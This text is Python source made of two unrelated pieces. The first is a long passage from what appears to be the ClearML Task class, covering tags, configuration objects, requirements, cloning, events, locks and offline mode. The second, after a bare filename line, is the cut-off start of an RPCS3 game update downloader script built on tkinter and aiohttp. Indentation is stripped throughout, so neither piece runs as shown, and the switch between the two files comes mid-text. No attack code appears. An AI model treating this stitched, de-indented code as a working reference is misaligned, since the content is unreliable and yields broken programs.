res = self.send(projects.GetAllRequest(name=exact_match_regex(project_name)), raise_on_errors=False)
if not res or not res.response or not res.response.projects or len(res.response.projects) != 1:
return False
project_id = res.response.projects[0].id
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
tags = list(set(tags))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
name = name or ''
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.id
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
comment = comment or ''
self._set_task_property("comment", str(comment))
self._edit(comment=str(comment))
def set_task_type(self, task_type):
# type: (Union[str, Task.TaskTypes]) -> ()
"""
Set the task_type for the Task.
:param task_type: The task_type of the Task (see optional values in TaskTypes).
:type task_type: str or TaskTypes
"""
if not isinstance(task_type, self.TaskTypes):
task_type = self.TaskTypes(task_type)
self._set_task_property("task_type", str(task_type))
self._edit(type=task_type)
def set_archived(self, archive):
# type: (bool) -> ()
"""
Archive the Task or remove it from the archived folder.
:param archive: If True archive the Task, If False make sure it is removed from the archived folder
"""
with self._edit_lock:
system_tags = list(set(self.get_system_tags()) | {self.archived_tag}) \
if archive else list(set(self.get_system_tags()) - {self.archived_tag})
self.set_system_tags(system_tags)
def get_archived(self):
# type: () -> bool
"""
Return the Archive state of the Task
:return: If True the Task is archived, otherwise it is not.
"""
return self.archived_tag in self.get_system_tags()
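# Illustrative usage sketch:
#     task.set_archived(True)    # adds the archived system tag
#     assert task.get_archived()
#     task.set_archived(False)   # removes it again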
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
.. code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return the task status without refreshing the entire Task object (only the status property).
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.demo.clear.ml/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached; any call retrieves all the scalar reports from the back-end.
If the Task has many scalars reported, it might take a long time for the call to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. Default is 0, returning all scalars.
When a sample limit is set, scalar values are averaged inside the sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(
task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return {}
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
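# Illustrative sketch of consuming the nested scalar dict (hypothetical titles/series):
#     scalars = task.get_reported_scalars(max_samples=1000, x_axis='iter')
#     for title, series_dict in scalars.items():
#         for series, axes in series_dict.items():
#             print(title, series, axes['x'][:3], axes['y'][:3])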
def get_reported_plots(
self,
max_iterations=None
):
# type: (...) -> List[dict]
"""
Return a list of all the plots reported for this Task.
Notice the plot data is Plotly-compatible.
.. note::
This call is not cached; any call retrieves all the plot reports from the back-end.
If the Task has many plots reported, it might take a long time for the call to return.
Example:
.. code-block:: py
[{
'timestamp': 1636921296370,
'type': 'plot',
'task': '0ce5e89bbe484f428e43e767f1e2bb11',
'iter': 0,
'metric': 'Manual Reporting',
'variant': 'Just a plot',
'plot_str': '{"data": [{"type": "scatter", "mode": "markers", "name": null,
"x": [0.2620246750155817], "y": [0.2620246750155817]}]}',
'@timestamp': '2021-11-14T20:21:42.387Z',
'worker': 'machine-ml',
'plot_len': 6135,
},]
:param int max_iterations: Maximum number of historic plots (iterations from end) to return.
:return: list: List of dicts, each one represents a single plot
"""
# send request
res = self.send(
events.GetTaskPlotsRequest(task=self.id, iters=max_iterations or 1),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return []
response = res.wait()
if not response.ok() or not response.response_data:
return []
return response.response_data.get('plots', [])
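# Illustrative sketch (plot payloads are Plotly-compatible JSON strings, see 'plot_str' above):
#     import json
#     plots = task.get_reported_plots(max_iterations=1)
#     for p in plots:
#         figure = json.loads(p['plot_str'])  # dict with Plotly 'data' / 'layout' keys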
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most recent console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most recent) console output
:return: A list of strings, each entry corresponds to one report.
"""
if Session.check_min_api_version('2.9'):
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
navigate_earlier=True,
batch_size=number_of_reports)
else:
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports)
res = self.send(request)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
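# Illustrative usage sketch:
#     last_lines = task.get_reported_console_output(number_of_reports=5)
#     print('\n'.join(last_lines))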
def get_configuration_object(self, name):
# type: (str) -> Optional[str]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a text blob (unconstrained text string)
Returns None if the configuration name is not valid
"""
return self._get_configuration_text(name)
def get_configuration_object_as_dict(self, name):
# type: (str) -> Optional[Union[dict, list]]
"""
Get the Task's configuration object section as parsed dictionary
Parsing supports JSON and HOCON, otherwise parse manually with `get_configuration_object()`
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a parsed dict.
Returns None if the configuration name is not valid
"""
return self._get_configuration_dict(name)
def get_configuration_objects(self):
# type: () -> Optional[Mapping[str, str]]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:return: The Task's configurations as a
dict (config name as key) and text blob as value (unconstrained text string)
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
return {k: v.value for k, v in configuration.items()}
def set_configuration_object(self, name, config_text=None, description=None, config_type=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[dict, list]]) -> None
"""
Set the Task's configuration object as a blob of text or automatically encoded dictionary/list.
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:param config_text: configuration as a blob of text (unconstrained text string)
usually the content of a configuration file of a sort
:param str description: Configuration section description
:param str config_type: Optional configuration format type
:param dict config_dict: configuration dictionary/list to be encoded using HOCON (JSON-like) into the stored text
Notice: you can pass either `config_text` or `config_dict`, not both
"""
return self._set_configuration(
name=name, description=description, config_type=config_type,
config_text=config_text, config_dict=config_dict)
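# Illustrative usage sketch (hypothetical section name/content):
#     task.set_configuration_object(name='augmentations', config_dict={'flip': True, 'crop': 224})
#     text = task.get_configuration_object('augmentations')            # raw text blob
#     parsed = task.get_configuration_object_as_dict('augmentations')  # parsed back to a dict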
@classmethod
def get_projects(cls):
# type: () -> (List['projects.Project'])
"""
Return a list of projects in the system, sorted by last updated time
:return: A list of all the projects in the system. Each entry is a `services.projects.Project` object.
"""
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()) for p in res.response.projects]
return []
@classmethod
def get_project_id(cls, project_name):
# type: (str) -> Optional[str]
"""
Return a project's unique ID (str).
If more than one project matches the project_name, return the last updated project.
If no project matches the requested name, return None.
:return: Project unique ID (str), or None if no project was found.
"""
assert project_name
assert isinstance(project_name, str)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update'], name=exact_match_regex(project_name)),
raise_on_errors=False)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()).id for p in res.response.projects][0]
return None
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``clearml-agent`` is not executing it)
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> None
"""
Force the adding of a package to the requirements list. If ``package_version`` is None, use the
installed package version, if found.
Example: Task.add_requirements('tensorflow', '2.4.0')
Example: Task.add_requirements('tensorflow', '>=2.4')
Example: Task.add_requirements('tensorflow') -> use the installed tensorflow version
Example: Task.add_requirements('tensorflow', '') -> no version limit
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.add_requirements() must be called before Task.init()')
cls._force_requirements[str(package_name)] = package_version
@classmethod
def ignore_requirements(cls, package_name):
# type: (str) -> None
"""
Ignore a specific package when auto generating the requirements list.
Example: Task.ignore_requirements('pywin32')
:param str package_name: The package name to remove/ignore from the "Installed Packages" section of the task.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.ignore_requirements() must be called before Task.init()')
cls._ignore_requirements.add(str(package_name))
@classmethod
def force_requirements_env_freeze(cls, force=True, requirements_file=None):
# type: (bool, Optional[Union[str, Path]]) -> None
"""
Force using `pip freeze` / `conda list` to store the full requirements of the active environment
(instead of statically analyzing the running code and listing directly imported packages)
Notice: must be called before `Task.init`!
:param force: Turn the forced use of `pip freeze` / `conda list` on/off
:param requirements_file: Optionally pass a requirements.txt file to use
(instead of `pip freeze` or automatic analysis)
"""
cls._force_use_pip_freeze = requirements_file if requirements_file else bool(force)
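# Illustrative usage sketch (all three must be called before Task.init; hypothetical packages):
#     Task.add_requirements('tensorflow', '>=2.4')
#     Task.ignore_requirements('pywin32')
#     Task.force_requirements_env_freeze(force=True)  # or requirements_file='requirements.txt'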
def _get_default_report_storage_uri(self):
# type: () -> str
if self._offline_mode:
return str(self.get_offline_mode_folder() / 'data')
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
if self._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _get_last_update(self):
# type: () -> (Optional[datetime])
if self._offline_mode:
return None
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_update']),
).response.tasks
return all_tasks[0].last_update
except Exception:
return None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _set_runtime_properties(self, runtime_properties):
# type: (Mapping[str, str]) -> bool
if not Session.check_min_api_version('2.13') or not runtime_properties:
return False
with self._edit_lock:
self.reload()
current_runtime_properties = self.data.runtime or {}
current_runtime_properties.update(runtime_properties)
# noinspection PyProtectedMember
self._edit(runtime=current_runtime_properties)
return True
def _get_runtime_properties(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version('2.13'):
return dict()
return dict(**self.data.runtime) if self.data.runtime else dict()
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
if Session.check_min_api_version("2.13"):
self._data.models = tasks.TaskModels(input=[], output=[])
self._data.container = dict()
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.13'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict(),
container=self._data.container, models=self._data.models)
elif Session.check_min_api_version('2.9'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict())
elif Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _is_remote_main_task(self):
# type: () -> bool
"""
:return: return True if running remotely and this Task is the registered main task
"""
return running_remotely() and get_remote_task_id() == self.id
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
if self._offline_mode:
for k, v in kwargs.items():
setattr(self.data, k, v)
Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True)
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f:
export_data = self.data.to_dict()
export_data['project_name'] = self.get_project_name()
export_data['offline_folder'] = self.get_offline_mode_folder().as_posix()
json.dump(export_data, f, ensure_ascii=True, sort_keys=True)
return None
# Since we are using a forced update, make sure the task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exceptions being name/comment/tags/system_tags/runtime, which we can always change.
if kwargs and all(k in ('name', 'comment', 'tags', 'system_tags', 'runtime') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# make sure we have str as values:
for key in requirements.keys():
if requirements[key] and not isinstance(requirements[key], str):
requirements[key] = '\n'.join(requirements[key])
# protection, Old API might not support it
# noinspection PyBroadException
try:
with self._edit_lock:
self.reload()
self.data.script.requirements = requirements
if self._offline_mode:
self._edit(script=self.data.script)
else:
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
with self._edit_lock:
self.reload()
self.data.script = script
self._edit(script=script)
def _set_configuration(self, name, description=None, config_type=None, config_text=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[Mapping, list]]) -> None
"""
Set Task configuration text/dict. Multiple configurations are supported.
:param str name: Configuration name.
:param str description: Configuration section description.
:param str config_type: Optional configuration format type (str).
:param config_text: Model configuration (unconstrained text string), usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# make sure we have either dict or text
mutually_exclusive(config_dict=config_dict, config_text=config_text, _check_none=True)
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
if description:
description = str(description)
# support empty string
a_config = config_dict_to_text(config_dict if config_text is None else config_text)
with self._edit_lock:
self.reload()
configuration = self.data.configuration or {}
configuration[name] = tasks.ConfigurationItem(
name=name, value=a_config, description=description or None, type=config_type or None)
self._edit(configuration=configuration)
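# Hedged sketch of how this internal helper is driven (names and values are
# hypothetical; exactly one of config_text / config_dict may be provided):
#
#   task._set_configuration('preprocess', config_dict={'resize': 256, 'crop': 224})
#   task._set_configuration('runtime', config_type='ini', config_text='[run]\nepochs=10')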
def _get_configuration_text(self, name):
# type: (str) -> Optional[str]
"""
Get Task configuration section as text
:param str name: Configuration name.
:return: The Task configuration as text (unconstrained text string),
or None if the configuration name is not valid.
"""
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
if not configuration.get(name):
return None
return configuration[name].value
def _get_configuration_dict(self, name):
# type: (str) -> Optional[dict]
"""
Get Task configuration section as dictionary
:param str name: Configuration name.
:return: The Task configuration as a dictionary,
or None if the configuration name is not valid.
"""
config_text = self._get_configuration_text(name)
if not config_text:
return None
return text_to_config_dict(config_text)
def get_offline_mode_folder(self):
# type: () -> (Optional[Path])
"""
Return the folder where all the task outputs and logs are stored in the offline session.
:return: Path object, local folder, later to be used with `report_offline_session()`
"""
if not self._offline_mode:
return None
return get_offline_dir(task_id=self.task_id)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: New name for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional tags for the new task
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new task's ID.
"""
session = session if session else cls._get_default_session()
use_clone_api = Session.check_min_api_version('2.9')
if use_clone_api:
res = cls._send(
session=session, log=log,
req=tasks.CloneRequest(
task=cloned_task_id,
new_task_name=name,
new_task_tags=tags,
new_task_comment=comment,
new_task_parent=parent,
new_task_project=project,
execution_overrides=execution_overrides,
)
)
cloned_task_id = res.response.id
return cloned_task_id
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all output artifacts, keeping only input artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
extra = {}
if hasattr(task, 'hyperparams'):
extra['hyperparams'] = task.hyperparams
if hasattr(task, 'configuration'):
extra['configuration'] = task.configuration
if getattr(task, 'system_tags', None):
extra['system_tags'] = [t for t in task.system_tags if t not in (cls._development_tag, cls.archived_tag)]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script,
**extra
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: python
status='completed', search_text='specific_word', user='user_id', project='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
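# Illustrative call (hypothetical filter values), mirroring the docstring above;
# the response shape follows the get_by_name usage further down:
#
#   res = Task.get_all(status='completed', search_text='specific_word')
#   task_ids = [t.id for t in res.response.tasks]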
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
@classmethod
def _get_project_name(cls, project_id):
res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
return res.response.project.name
def _get_all_events(
self, max_events=100, batch_size=500, order='asc', event_type=None, unique_selector=itemgetter("url")
):
# type: (int, int, str, str, Callable[[dict], Any]) -> Union[List[Any], Set[Any]]
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:param batch_size: The maximum number of events retrieved by each internal call performed by this method.
:param order: Events order (by timestamp) - "asc" for ascending, "desc" for descending.
:param event_type: Event type. Pass None to get all event types.
:param unique_selector: If provided, used to select a value from each event, only a unique set of these
values will be returned by this method.
:return: A list of events from the task. If unique_selector was provided, a set of values selected from events
of the task.
"""
batch_size = max_events or batch_size
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
))
returned_count = log_events.response.returned
total_events = log_events.response.total
scroll = log_events.response.scroll_id
if unique_selector:
events_list = set(map(unique_selector, log_events.response.events))
else:
events_list = log_events.response.events
while returned_count < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
scroll_id=scroll,
))
scroll = log_events.response.scroll_id
returned_count += log_events.response.returned
if unique_selector:
events_list.update(log_events.response.events)
else:
events_list.extend(log_events.response.events)
return events_list
@property
def _edit_lock(self):
# type: () -> ()
# skip the actual lock, this one-time lock will always enter
# only used on shutdown process to avoid deadlocks
if self.__edit_lock is False:
return RLock()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
filename = os.path.join(gettempdir(), 'clearml_{}.lock'.format(self.id))
# no need to remove a previous file lock left by a dead process; it will automatically release the lock.
# # noinspection PyBroadException
# try:
# os.unlink(filename)
# except Exception:
# pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Optional[Union[str, Task]]) -> None
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock the next time we need it.
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_pid, _, master_task_id = PROC_MASTER_ID_ENV_VAR.get('').partition(':')
# we could not find a task ID, revert to old stub behaviour
if not master_task_id:
return None
return master_task_id
@classmethod
def __get_master_process_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# without a task ID, revert to the old stub behaviour and report no master process
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[0]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
@classmethod
def set_offline(cls, offline_mode=False):
# type: (bool) -> None
"""
Set offline mode, where all data and logs are stored in a local folder for later transmission
:param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled.
:return:
"""
if not running_remotely():
ENV_OFFLINE_MODE.set(offline_mode)
InterfaceBase._offline_mode = bool(offline_mode)
Session._offline_mode = bool(offline_mode)
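# A hedged end-to-end sketch of the offline workflow (folder handling is
# inferred from get_offline_mode_folder() above; names are hypothetical):
#
#   Task.set_offline(offline_mode=True)
#   task = Task.init(project_name='examples', task_name='offline-demo')
#   ...  # run as usual; outputs land under task.get_offline_mode_folder()
#   Task.set_offline(offline_mode=False)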
@classmethod
def is_offline(cls):
# type: () -> bool
"""
Return the offline-mode state. If in offline-mode, no communication to the backend is enabled.
:return: boolean offline-mode state
"""
return cls._offline_mode
@classmethod
def _get_task_status(cls, task_id):
# type: (str) -> (Optional[str], Optional[str])
if cls._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = cls._get_default_session().send(
tasks.GetAllRequest(id=[task_id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
|
RPCS3 Game Update Downloader.py
|
## This code is trash and will make your eyes bleed. You have been warned.
## This program requires you to install PyYAML and aiohttp (python -m pip install pyyaml aiohttp[speedups])
## This program also requires Python 3.8 or higher due to using the walrus operator
import yaml
import asyncio
import aiohttp
import threading
import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
from xml.etree import ElementTree
from typing import Callable
## CONSTANTS
# Declare a constant for 1MiB, which is 2^20
ONE_MEBIBYTE = 2**20
## FUNCTIONS
# async_op takes in an async function and a list of arguments for said function. It then creates an Event Loop and runs the async function in a thread using said loop.
def async_op(func: Callable[..., None], args: list = None):
# Avoid the mutable-default-argument pitfall by creating a fresh list per call.
args = args if args is not None else []
loop = asyncio.new_event_loop()
# We need to pass in the given args in addition to the actual loop, so we unpack the args list in a new tuple along with the loop.
threading.Thread(target=func, args=(*args, loop,)).start()
# async_download_handler takes in a URL string, a string for the save path, an integer for the size of the file in bytes, a tkinter Button, and an asyncio Event Loop.
# It then runs the async function download_update in the given Event Loop until it completes, then terminates the loop.
def async_download_handler(url: str, save_path: str, size: int, button: tk.Button, loop: asyncio.AbstractEventLoop):
button.configure(text="Downloading...")
loop.run_until_complete(download_update(url, save_path, size, button))
loop.close()
# async_query_handler takes in an asyncio Event Loop. It then runs the async function load_game_info in the given Event loop until it completes, then terminates the loop.
def async_query_handler(loop: asyncio.AbstractEventLoop):
loop.run_until_complete(load_game_info())
loop.close()
# download_update is an async function that takes in a URL string, a string for the save path, an integer for the size of the file in bytes, and a tkinter Button.
# It then downloads the file specified by the URL to the specified save path and shows the progress of the download in a popup window.
async def download_update(url: str, save_path: str, size: int, button: tk.Button):
# Splitting the given URL by the '/' character and taking the last string in the resulting array gives the name of the file on the server.
# E.g., "playstation.com/files/example.pkg".split('/')[-1] results in the string "example.pkg".
